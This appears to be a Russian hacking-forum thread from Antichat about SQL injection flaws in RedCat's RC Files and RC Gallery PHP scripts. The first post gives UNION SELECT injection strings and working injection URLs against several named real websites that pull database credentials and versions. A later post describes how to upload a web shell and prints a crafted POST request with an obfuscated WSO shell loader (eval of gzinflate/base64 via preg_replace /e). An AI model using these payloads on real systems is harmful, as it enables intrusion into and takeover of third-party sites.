Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Уязвимости в скриптах от RedCat |

02.02.2008, 18:01
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме: 921520
Репутация:
572
|
|
Уязвимости в скриптах от RedCat
Нашел банальную уязвимость в скрипте RC Files v1.0 от RedCat'a, но оказалось, что дырка эта присутствует и в другой его наработке, RC Gallery, причем кочует из версии к версии.
-------------------------------------
RC Files v1.0 | Powered by RedCat | ©2004-2008
-------------------------------------
Уязвимость присутствует из-за отсутствия фильтрации в параметре cat, что позволяет сформировать свой целевой запрос.
cat=-1+union+select+1,2,3,4,5,6,7,8,9,0/*
гуглим, видим:
http://www.kfmgtu.ru/download/?cat=-3+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6,7,8,9,0/*
http://www.legalref.ru/rc/?cat=-7+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,0/*
...
Уязвима также и версия 1.1, уязвимость аналогичная
Более распространенный скрипт RC Gallery имеет аналогичную ошибку:
-------------------------------------
RC Gallery v(<=)2.3 | Powered by RedCat | ©2004-2008
-------------------------------------
Уязвимость присутствует в параметре cat. Позволяет нам составить целевой запрос.
имеем
http://www.beeland.ru/pc/index.php?page=1&vtype=big&cat=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/*
http://www.space-studio.ru/gallery/?cat=-2+union+select+1,2,3,4,user(),6,7/*
http://www.suv4x4.ru/gallery/?cat=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/*
...
в версии 2.4 узвимость устранена.
keywords : RC Gallery v2.3 (2.1,1,1..), RC Files v1.1, Powered by RedCat
Последний раз редактировалось Серенький; 02.02.2008 в 19:10..
|
|
|

21.02.2008, 00:51
|
|
Новичок
Регистрация: 19.02.2008
Сообщений: 3
Провел на форуме: 12035
Репутация:
5
|
|
При помощи гугла наткнулся на данную статью.
Очень приятно , что на мои скрипты ктото обратил внимание))) Хоть и в таком ракурсе, но всёравно приятно! Спасибо.
Скрипт галереи , это мой первый большой скрипт. Ни о каких "мерах безопасности" речь там не шла, была идея создать скрипт. До версии 2.4 они почти не отличаются друг от друга. Версия 2.4 переписана почти с нуля, но используется несколько кусков старого кода. До версии 2.5 руки не дошли, нужно было зарабатывать деньги и я стал заниматься "коммерческими" скриптами. Галереи 2.5 не будет, да и вообще наверное никаких больше скриптов не будет, не позволяет занятость на другом фронте. В обще при создании этой галереи я получил огромный опыт, хотя после были и другие более серьёзные скрипты.
Если чтото интересно, спрашивайте...
А пока, всем пока 
|
|
|

24.11.2009, 00:04
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
наткнулся на эти скрипты а их до меня уже копали.. нашёл тоже самое.. такой облом.
====================
заливка шелла
1. пароль расшифровался.
идём в админку adm_gallery.php
редактируем Допустимые расширения и вписываем php через запятушку. заливаем шелл в месте загрузки картинок.
2. пароль не расшифровался.
посмотрев, исходники формируем сразу POST-запрос для заливки. По умолчанию php не фильтруется(!!!)
в куках ставим gal_admin_get_pass=<хеш пароля>
POST-запрос (весь код шелла wso не вместился)
Код:
POST /gal_admin.php HTTP/1.1
Host: site.ru
Keep-Alive: 30
Proxy-Connection: keep-alive
Cookie: gal_admin_get_pass=b01502fd0c860bdd35c5c9289de412db
Content-Type: multipart/form-data; boundary=---------------------------11538186919912
Content-Length: 23969
-----------------------------11538186919912
Content-Disposition: form-data; name="upload_cat"
1
-----------------------------11538186919912
Content-Disposition: form-data; name="upload_name"
123
-----------------------------11538186919912
Content-Disposition: form-data; name="upload_text"
234
-----------------------------11538186919912
Content-Disposition: form-data; name="upload_big_file"; filename="wso2.4.php"
Content-Type: application/force-download
<?php
$auth_pass = "пыщь";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31W
....
...тут код шелла)))
....
LkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");?>
-----------------------------11538186919912
Content-Disposition: form-data; name="com"
upload
-----------------------------11538186919912
Content-Disposition: form-data; name="gal_menu"
add
-----------------------------11538186919912--
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|